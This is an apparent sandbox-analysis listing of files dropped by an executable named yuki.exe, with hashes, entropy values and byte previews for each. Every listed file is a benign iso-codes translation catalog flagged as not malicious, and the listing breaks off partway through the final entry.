                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c.......................+...(...J...,...s...........)....................................... ...)...(...J.......s...................................................#...................6.......K.......Q... ...a...)...............................%....................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 142 messages, Project-Id-Version: iso_4217 'afgani'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7114
                                                                                                    Entropy (8bit):4.776735770176595
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:HniqyehCmFISf3epPCVOkKiCWNnISIz3kBbDNf:Hn48dupPGlKifnIzwbDNf
                                                                                                    MD5:069EBEFE756C813E6EB66CA783F2E920
                                                                                                    SHA1:0423951ACB2797BC37F4C7AC1F59BBC8EC5AB2DC
                                                                                                    SHA-256:051EA8F89764F8C1AA02063B1CE8E68E85F66DDFBF715DD632E8F7C824CBD397
                                                                                                    SHA-512:C3E193BAB00CC2A9564528FFCF0EA3661450636407860E2F016055A83AB0DFE4C5ABA140EBF1BABC0F4CC5FC1A518DAA3F8E1A451CE6DEAE1EFB07487600A8EC
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................-.......?.......O.......^.......c.......j.......z...............................................................................................+.......8.......G.......W.......c.......u.......................................................................................................................2.......>.......E.......P.......`.......e.......l.......t.......................................................................................................................#.......2.......6.......>.......D.......T.......a.......k.......p...............................................................................................................7.......H.......X.......`.......o.......y...............................................................................................................................!.......-.......;.......L.......S.......d.......{.......................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 323 messages, Project-Id-Version: iso_639-3 'abha\305\241\304\215ina'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14346
                                                                                                    Entropy (8bit):4.768853034820279
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:f6vsSzFPegGnbBL6VexdgdzSHgRb+PFMQI7yGUJPdSFZjHUdpcd33rurHDd0DuAE:faTGRpxdgY8gFMQI7BFFx0UEHDdo7O53
                                                                                                    MD5:8C2BAA8823C935EF0139EFB8A5F5BD68
                                                                                                    SHA1:6274DF5C3651AFD59AAD60FD1830BD7A094C16F1
                                                                                                    SHA-256:992E65C8C0AD1EC3AD7C1602B50FD9915B845A4FD514A5E869EFCBBE5E40987C
                                                                                                    SHA-512:C321CB0A7CD7E2B8DB4D4C8C958B7F2BEA3581056C3CDB4ECE714C62CDB22F27585D57D879C624B0800D9BAF1F5F2412AD29AD15F50FD9D259171C2C83D680EF
                                                                                                    Malicious:false
                                                                                                    Preview:........C.......4.......L.......................................".......*......./.......8.......B.......G.......P.......Y......._.......g.......n.......u.......................................................................................................................................................................#.......(......./.......8.......B.......I.......Q.......Y.......a.......j.......s.......{...............................................................................................................................................................'.......-.......4.......:.......@.......F.......O.......T.......g.......n.......v.......~.......................................................................................................................................................................$...............5.......;.......T.......j.......r.......{.......................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 16 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1189
                                                                                                    Entropy (8bit):5.093539366987194
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2DieynWreSDOO5ECVt0U8GENW/OXmGRLpl6:Qi1nMeSDl5ElUcWTil6
                                                                                                    MD5:6279A8AC54B44810EA0C413E1A07779E
                                                                                                    SHA1:197010F4E7179DC0D908FD4E58C28D5226D47A32
                                                                                                    SHA-256:B7BA7287CAF4E9C858A3B4F8470C46DFFBD1BB41BD5523514998D7BA90C07374
                                                                                                    SHA-512:94CD6031FB76E0D4B3DF97B403514DBA8683CF3AB726A499083CE9848D69A3AB782E0EF9276BEA74080B734927D302DDE711F58F7FA61A8457D6D918299F872E
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y......................................................................................................................................................................./.......7.......@.......H.......P.......[.......b.......q.......{........................................................................................................Adlam.Afaka.Ahom, Tai Ahom.Arabic.Arabic (Nastaliq variant).Armenian.Avestan.Balinese.Bamum.Bassa Vah.Batak.Bengali.Bhaiksuki.Caucasian Albanian.Imperial Aramaic.Project-Id-Version: iso_15924.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2023-01-20 19:59+0000.Last-Translator: Shafici Isxariifshe <mega12xhaphiee@gmail.com>.Language-Team: Somali <https://hosted.weblate.org/projects/iso-codes/iso-15924/so/>.Language: so.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 132 messages, Project-Id-Version: iso_3166-1 'Afgaanistaan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6066
                                                                                                    Entropy (8bit):4.711967093935229
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:tDRtEJWl5EIFFrx8JU+xtxPSW6beF4se6/W14rXwoyga0dmB4Bqkeic5K:tDRtEJWl5EIPreJU+xtRveeF4se6/WiN
                                                                                                    MD5:341BCB3D9BF343F2A315F225C9AE0890
                                                                                                    SHA1:3A30EA316C53D4466316E6C4CFF802687AEF2435
                                                                                                    SHA-256:BFA8A1DEEBDC9AA6D3DEFA3B97FE789EB719E1A778DA1F9B5CD3A20C2CFD4AC0
                                                                                                    SHA-512:6BFA6FEBAFB31E38FCC236C1FE8DAE13D09BB65F87AEE25F83C236A777093D17F84BA1133968112F63B98E193CAADF77D30257562E7B00F89B1DB47F3BE0ECD9
                                                                                                    Malicious:false
                                                                                                    Preview:................<.......\.......(.......).......5.......=.......E.......M.......T.......h.......r.......z...............................................................................................................................................".......).......B.......G.......M.......S.......\.......g.......o.......t.......{...............................................................................................................................................!.......(.......F.......N.......V.......\.......f...................................................................................&................................... .......(.......0.......8.......>.......I.......T.......[.......d.......i.......o.......z...............................................................................................................................................'.......=.......E.......X.......e.......r.......z...............................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):372
                                                                                                    Entropy (8bit):5.147693394519902
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijn1YYxAgCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGrvXmBQ8KMW0YEi9:i4n1xx8t02Ukx/iximCg5ITAXmBQWi9
                                                                                                    MD5:7BF0B30C29A1957C4294552FA44952F5
                                                                                                    SHA1:8ACEB1527B83C553B1EFA83C66FBE84773E58585
                                                                                                    SHA-256:9B01F66719B7094D31257F472500E3EDD3620E42E98F95D1DC37ABA20F9CC17B
                                                                                                    SHA-512:4FBDE61F4CFAE27F5EAA24FAAB7CD1416ED215BB97AF4EC0A28D287C271D9E462196353921977DBFB61EE622F45A168D596BB0BF62E00054C58F14B77721DD7A
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...:...9................Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: so.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 6 messages, Project-Id-Version: iso_3166-3 'Jamhuriyada Kacaanka hanti wadaaga ee Belarus'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):996
                                                                                                    Entropy (8bit):5.221601171933196
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Jscfnq7pWUA5t0Un3afNW/lXmGErXBZLPF:NvKRAoUnKlWoFrX3LN
                                                                                                    MD5:C32974D28D42462D0707D3DC30DA294A
                                                                                                    SHA1:671ED5F53B0032F6BB13AECFA7B0672953211332
                                                                                                    SHA-256:409F7590D11ED6998F33DD3ABC25E027403D85F5B6A955EBAE00682153DFBA83
                                                                                                    SHA-512:F4AB72E6DE2146FAEBB8533EC6675A10DD185FF173073F5144BE06F2A230DD821178ED18E28B02E7C87ECB0B824F0E1A8E2D7F5B9F48B5ADA1531BFA5BDF1877
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|...........*.............../...........!.......<.......R...-....... ...M...9...n..."............................................................Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.German Democratic Republic.Serbia and Montenegro.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2020-11-08 02:27+0000.Last-Translator: Sirr Burhaan <sirrburhaan@gmail.com>.Language-Team: Somali <https://hosted.weblate.org/projects/iso-codes/iso-3166-3/so/>.Language: so.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 4.3.2..Jamhuriyada Kacaanka hanti wadaaga ee Belarus.Canton Iyo Jasiiradaha Enderbury.Jegoslafakiya, Jegoslafakiya Jahuuriyada Hanti wadaaga ah.Jamhuriyada dimiqraadiga ee Jarmal.Sayberiya iyo Montinegro.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_4217
                                                                                                    Category:dropped
                                                                                                    Size (bytes):370
                                                                                                    Entropy (8bit):5.147120633157777
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijLYYxkXCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGrvXmBQ8KMW0YEi9:i4LxxRt02Ukx/iximCg5ITAXmBQWi9
                                                                                                    MD5:38B40AC52EB32BE41FD9010FCE052B60
                                                                                                    SHA1:17EE1F9D51A2A57485AC3F26E7E502D2C0D30362
                                                                                                    SHA-256:1665529045E81E95BD352477C800D7CC3DC36691A5CCAA8C8AE85EBD6A30CE32
                                                                                                    SHA-512:9113731CD47A05B4ED65271A08F6E2328C03E536A7980B51E35B5F582AAC818C9FB8C12FFC4E9793EFBE5B3AB8155F9B9D306AB2AF006E9D760F18B160AB9B71
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...8...9................Project-Id-Version: iso_4217.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: so.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_639-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):371
                                                                                                    Entropy (8bit):5.140627882633461
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijcYYxq7HCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGrvXmBQ8KMW0YEi9:i4cxxq7it02Ukx/iximCg5ITAXmBQWi9
                                                                                                    MD5:2481667F54DBBE5214502C1F822BED79
                                                                                                    SHA1:93A1B710EF5A4D1AAAA93741D69AB16DBE47DA38
                                                                                                    SHA-256:A9F9FF7A83A41997B7E7F27DADB50451DCA49FD75A4B5EA6BD95E5CA054B9836
                                                                                                    SHA-512:7AA815F6AB23C78067986F48BE2063764FF47C1E685D838E56555248A2DFCA18C8CD1E73C2764861EE94B5DF1CBA5060151F851799E150E560AF342050A70D34
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...9...9................Project-Id-Version: iso_639-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: so.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 211 messages, Project-Id-Version: iso_3166-1 'Afugaanisitan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9275
                                                                                                    Entropy (8bit):4.747189261110563
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:XWlGwfqqE5WGtXQk/xT/aRzug09pVN+MQVNQ5dwS2Ou:XWtE8Gtg6xzaNugUpVN8C5WFOu
                                                                                                    MD5:E730AE3D478E820CF78BD27C3A600A11
                                                                                                    SHA1:9128F7DE916FA83D6D8272DC8C4D6F62E0B313B8
                                                                                                    SHA-256:0497F71F7945B179E63F1CE0FCC3B61E37D16EDC3F54CAFA4618EEF0A5641065
                                                                                                    SHA-512:8EB19A29EFE3064A1549D74A4B9B26850E9535C8BD7A6284233154C33C7BC4582FD4ED78F9942EDF5A6AFA154E840178B315BE5DA36540E6BCBCE55D56C56E7A
                                                                                                    Malicious:false
                                                                                                    Preview:........................L...............................................................................................................!.......).......4.......<.......D.......O.......X.......`.......h.......o.......u.......}...............................................................................................................&.......?.......D.......J.......P.......a.......y.............................................................................................................................................../.......7.......?.......H.......V.......[.......c.......j.......x.......................................................................................................................................#.......*.......0.......9.......C.......K.......S.......Y.......c.......h.......p.......|...............................................................................................................................................................$.......+.......4.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_15924
                                                                                                    Category:dropped
                                                                                                    Size (bytes):518
                                                                                                    Entropy (8bit):5.311570819715247
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i4/xxCfVt02UkwJA/YcKB8LLFw/43PvIsXmBQWiOWF:RZCVt0UPCT/psXmGF
                                                                                                    MD5:2995B051BF1CD12B74C975C16881B4B6
                                                                                                    SHA1:561C6173287B31546714880CED396D3EEC646110
                                                                                                    SHA-256:BAA5062916C9B95BA3317F135EAFBBA1A5C6B2A593FAF95DA918E61FB4B97595
                                                                                                    SHA-512:2E771088148325D86F69211429CA7EDDBE5384CBEB1EE3487F3E9E27C4372E6B1DBF2140D388AFD31630FEDADEFCCE4BA46B6ECB9C89B63E9CF75AC4494FAFD9
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_15924.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2022-11-26 20:47+0000.Last-Translator: Besmir Godole <bgodole@gmail.com>.Language-Team: Albanian <https://hosted.weblate.org/projects/iso-codes/iso-15924/sq/>.Language: sq.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 4.15-dev..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 421 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23866
                                                                                                    Entropy (8bit):5.04697200416743
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:snboRT6k+bR/vyUXs4zmwZbjh5wsWP4XWAIziUGqbaJeNRDpgNJpPszc:sxZZzmotmsWP4XWAItOJ2DpgNJZD
                                                                                                    MD5:C6B31171A973F8B5EA1B8EA828893A6A
                                                                                                    SHA1:B3FA21AC8885E7623ED90884FA58D773B2CD5409
                                                                                                    SHA-256:AA083F1F372A8DA40807A1D8CA77A767B61AD4FA89B7639B5C16CF567C5197AF
                                                                                                    SHA-512:9911BB4991A08A59DC895590D77C6A70B256FF0AA30552FEDA3CCCF8E2DCF1CC822C9F78B6C2CB5DE2D4172A4A54FCE8897D7AAD17008990544DCAC319783DD7
                                                                                                    Malicious:false
                                                                                                    Preview:................D...3...l.......8#......9#......E#......M#......U#......d#......l#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......&$.......$......5$......;$......C$.. ...J$......k$......s$.. ....$.......$.......$.......$.......$.......$.......%.......%......1%......:%......G%......O%......Z%......c%......l%......s%.......%.......%.......%.......%.......%.......%.......%.......%.......%..,....&......@&......H&..%...N&......t&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....&.."..."'..*...E'......p'......x'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(......#(..'...1(..$...Y(......~(.......(.......(.......(.......(.......).......).......)......#)......1)......B)......R)......n)......t).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):372
                                                                                                    Entropy (8bit):5.162886869599114
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijn1YYxAgCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITG1WNsXmBQ8KMW0YEi9:i4n1xx8t02Ukx/iximCg5ITOIsXmBQWk
                                                                                                    MD5:615F071E3DCC6A78653334EFACBDF0F5
                                                                                                    SHA1:E48A6661732557CCB56BB9711A3D9BDBB15389E4
                                                                                                    SHA-256:E2CE734745E1A40BB0F929D7A5AA0915492DF63577602BF2476A61755608EC0A
                                                                                                    SHA-512:477B5C0AE6E9640562106212B49FCA696C3ECD0DA4B9A0216F3CB5AC500CDCA7E27B2D00A6C347E2925A78EBA153C91249F0C42563C09EED30442AC284E31E90
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...:...9................Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: sq.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 30 messages, Project-Id-Version: iso_3166-3 'Territoret Britanike t\303\253 Antarktikut'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2664
                                                                                                    Entropy (8bit):5.2273459799486
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:ej6JmE/7EvxqIfdvqNuoUsOIn2l92J22QolMsl+2LRI5rjNM4SrO:hkwE1BooIn4sJMspLRI9t
                                                                                                    MD5:A600AF2C1B44A90D58A3AFAA31DFBD06
                                                                                                    SHA1:4F04AE6E21F40C7F20F168287E60E66D13AD9A87
                                                                                                    SHA-256:4EC49E4B462ADF45434E291D27624097B978AA2286720DA7A2B635607BA82763
                                                                                                    SHA-512:74A39C7EB8CB0162D94B4DB8FF9DE6B3DFF9D0FF854B443508E4A394A832AE7A073ECEA5FD364DE4BC47CA4584C026FE9EE2EC40E1150420AA398812A33DC944
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*.............../.../......._.......g.......r...........)...................................................2.......?...!...L.......n........................... .......)............... ...........4...2...@.......s...........$...Y...)...~...)...............1...........".......*.......8.......N...(...e...........................................................%...........8.......U.......h.......o...,.......1....... ....... ........... ...(...,.......U........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territories.German Democratic Republic.Gilbe
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_4217
                                                                                                    Category:dropped
                                                                                                    Size (bytes):370
                                                                                                    Entropy (8bit):5.162396235129308
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijLYYxkXCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITG1WNsXmBQ8KMW0YEi9:i4LxxRt02Ukx/iximCg5ITOIsXmBQWi9
                                                                                                    MD5:3617B5AFEBE12AB0BC9BC69455C45F6C
                                                                                                    SHA1:477E38B61B98B7DAF76F073F952303F717A1EE9B
                                                                                                    SHA-256:5ED87D0C4DFD05E9B10C7D378EB83CF3AF7928D8AB06A15A8DA76EF9F6D4DBFD
                                                                                                    SHA-512:046526D24E1E3D9A7F5775068A98C12613B560B2223EFE45EA468B787D96E5F0C0588C7AE299663AA96253A074A9A5600A3AB70AC40C435B2FA9018C6EDB65CF
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...8...9................Project-Id-Version: iso_4217.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: sq.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_639-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):371
                                                                                                    Entropy (8bit):5.155862310475688
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijcYYxq7HCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITG1WNsXmBQ8KMW0YEi9:i4cxxq7it02Ukx/iximCg5ITOIsXmBQV
                                                                                                    MD5:6460148501EDBF66587A1850CFA3E855
                                                                                                    SHA1:2690AB6E572E376BF0B3D3FBE3A8D3FB2BC73B0B
                                                                                                    SHA-256:DE62FFECD7650F6957E2AD3F3836EBD758943AEB7BAD40EFC917D1169CFDE199
                                                                                                    SHA-512:6079FF24121E6F71642EB8BDD13E99B29A237CFD403040902D3F05FC9531C53C3F56BC90A22D30535A8EFDD2D7B00594B759892CDE189E8A8C972AAF2C2A714E
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...9...9................Project-Id-Version: iso_639-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: sq.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 61 messages, Project-Id-Version: iso_639-5 'Gjuh\303\253 afroaziatike'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3810
                                                                                                    Entropy (8bit):4.868884714479862
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:5q3GMhqqye6dbK2U7ayDu3KK0UL30ULf+qadXQvhr/CUJhT6YIkRQONgxr9F6:0WM0F5R0E0C+fIC0hT6YIkRXM9o
                                                                                                    MD5:7674B439B8F3830367523024C07E0533
                                                                                                    SHA1:997AF8C5CEDCC3C2B6EEBCA469373B237E3FC093
                                                                                                    SHA-256:73FEA78059FDEC8562FB36E1478A258DF9C086983F8D88C9ADE3C8567B98D7C6
                                                                                                    SHA-512:DA1B83856067F101542FCD394E23FD1FBB1E68B2CB4841203B65D3A83004FEF241B94B025051D225B13761EE77CD293CF702590827A7757064E9F4336AF9C01F
                                                                                                    Malicious:false
                                                                                                    Preview:........=...........S...........8.......9.......P.......e.......v.......................................................................!.......2.......C.......W...!...h...................%...........................................&.......4.......D.......\.......n.......................................................................................:.......Q.......q...............................................................................).......:.......K.......].......o.......}...........................9...................................-.......;.......N.......^.......q...................................................................%...........".......1...#...D.......h.......w....................................................................................... ...............<.......H.......X.......e.......t...........$...........................................................(.......7.......E.......U.......j.......u.......................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10451
                                                                                                    Entropy (8bit):5.02234227533195
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dHclkPR3wGjcAbXwltU4WjV9qWxa5hW855Xo78/ZJh0JcbC:FcmPR3wGXXwg4WjVDxa5hW855X13h0Jd
                                                                                                    MD5:6E8E0A1ACFF5A45AD6FB6D4A5C01F3DA
                                                                                                    SHA1:780B0CD0E0A6F9130E6921C412E323ADDF5F538B
                                                                                                    SHA-256:B30EB24384BF305765FE2F86CBD90A2D7C098AC03F57890AFF9460492254C3CF
                                                                                                    SHA-512:242086549AFFA6A0ADA8F668866E295A7F73B47679FB577D2B89D1EA701816E812C8CD2E426F7977B71FCEDBAA1F767031F6147DBD8ACA405305E5B5E7AB899F
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 'Avganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23246
                                                                                                    Entropy (8bit):5.045578954055911
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:jhl7o5a/D+8OuJOKV4/Ubjh5wsWP4XdAIzirGssBm8hkkwInC7Pcs:jhZSjKV4ItmsWP4XdAILh8i+
                                                                                                    MD5:0D7E65EBE68124C8C32AB5F6C55875E2
                                                                                                    SHA1:D0F0B90635C4529BC2BF91B639E99D9327CC3F33
                                                                                                    SHA-256:990877402C7034989707FE34B09455384EA67C588EEF72971C11674336433101
                                                                                                    SHA-512:3EBA67F02F97C5E240C2C0683F9A99086E9EBC5F3DD5FE683217AB9AA19BAC09BDA7F226723768815A2B23A0468BA4E571B9CA8BA229D6DC5F7A9C5B618A8A08
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2961 messages, Project-Id-Version: iso_3166-2 'Eva'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):121630
                                                                                                    Entropy (8bit):5.128105960008055
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:jNKKf3jNuFbIBbFkI8ClypNqTQ7KGP615es7Oavs2b5FuUcYx3mg:pKSQhiTl/m6109aUAovYx3n
                                                                                                    MD5:540CA9B22149C3688036B7D0E0979A02
                                                                                                    SHA1:AA908EA7C8E8583EA7B712A90E290AD085A69FD2
                                                                                                    SHA-256:8E85AE3DA5E61A4B629AE3D2AC47898C361664CA1C4C01CD0617AFE07C723A4D
                                                                                                    SHA-512:DBF239521D6DA964A0B5DC98F4EC8E3D6312B24D02313874F64144137901D80E3B225D332F953C8ECF518FBEEFCF8AD1A5E3B7C015828894F2721B719F585E79
                                                                                                    Malicious:false
                                                                                                    Preview:.................\......,.......(.......)...............4.......<.......C.......Q......._.......d.......i.......r.......w...............................................................................................................................................".......3.......B.......G.......S.......Y.......g.......m.......z....................................................................................................................................................... .......*.......4.......B.......M.......[.......h.......p.......x.......................................................................................................................................................#.......,.......;.......D.......K.......Q.......Z.......a.......i.......p.......w...............................................................................................................................*.......6.......D.......L.......Y.......c.......k.......w.......................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Britanska Antarkti\304\215ka Teritorija'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2709
                                                                                                    Entropy (8bit):5.281058910844995
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADNkBTpleEnvGqIfdvqNuoU2EjupWDjtkopTI5i0aWFfiIoxaYHYl:qDmPyBouuakxU03jUxI
                                                                                                    MD5:38C4B446A454962489F6013ABE864B3D
                                                                                                    SHA1:D00A1A13E2B3921A982591075A3DA23DCDD0E937
                                                                                                    SHA-256:DB3952EC2446A22E1006A810757D557D43180F514C2BD110EAA6DC75B156552D
